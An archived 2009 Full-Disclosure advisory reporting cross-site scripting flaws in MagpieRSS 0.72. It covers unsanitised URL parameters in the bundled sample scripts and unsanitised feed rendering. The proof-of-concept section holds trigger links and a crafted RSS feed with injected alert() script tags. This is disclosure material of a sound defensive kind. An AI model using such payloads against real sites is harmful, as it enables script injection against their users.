|
|
[ Message Precedent sur la mailing][ Message Suivant sur la mailing][ Precedent dans le fil][ Prochain dans le fil][ Index par Date][ Index par fil]
[Full-disclosure] MagpieRSS Multiple XSS Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -= MagpieRSS Multiple XSS Vulnerabilities =-
May 6, 2009
Author: Justin C. Klein Keane <justin@xxxxxxxxxxxx>
Software: MagpieRSS (link://[click])
Version Tested: magpierss-0.72
Vendor notified
Full details can also be found at
link://[click]
MagpieRSS (link://[click]) is a PHP based RSS reader.
"MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS
1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie
suffers from multiple cross site scripting (XSS) vulnerabilities. The
first class of vulnerability is due to the failure to sanitize URL
variables in scripts included with the MagpieRSS distribution.
Specifically the $url variable is crafted from $_GET['url'] and used in
display to users in:
magpierss-0.72/scripts/magpie_simple.php
magpierss-0.72/scripts/magpie_debug.php
The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url
variable, but cast from $_GET['rss_url'].
The second class of XSS results from MagpieRSS' failure to sanitize any
of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This
could result in cross site scripting vulnerabilities being injected by
malicious RSS feeds.
- -=Proof of concept=-
The following links can be used to trigger XSS in Magpie's sample scripts:
link://[click](%27xss%27);%3C/script
link://[click](%27xss%27);%3C/script
The following malicious RSS feed can be used to exploit Magpie's RSS
rendering:
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="link://[click];
xmlns:dc="link://[click];>
<channel>
<title>Justin.MadIrish.net <script>alert('xss title');</script>-
Justin's Personal Homepage</title>
<link>link://[click]</link>
<description>Close personal friends with Evil Eve.</description>
<language>en</language>
<item>
<title>Disturbing<script>alert('xss title');</script>
XSS<script>alert('xss title');</script></title>
<link>link://[click] <script>alert('xss
link');</script></link>
<description>foobar</description>
<pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
<dc:creator>justin</dc:creator>
<guid isPermaLink="false">343 at link://[click]</guid>
</item>
</channel>
</rss>
- --
Justin C. Klein Keane
link://[click]
link://[click]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - link://[click]
iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs
ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i
iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI
G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM
EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G
M5uacRMg93U=
=sY6i
-----END PGP SIGNATURE-----
Full-Disclosure - We believe in it.
Charter: link://[click]
Hosted and sponsored by Secunia - link://[click]
Archives de la liste de diffusion Secunia
Archives de la liste de diffusion Full Disclosure
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
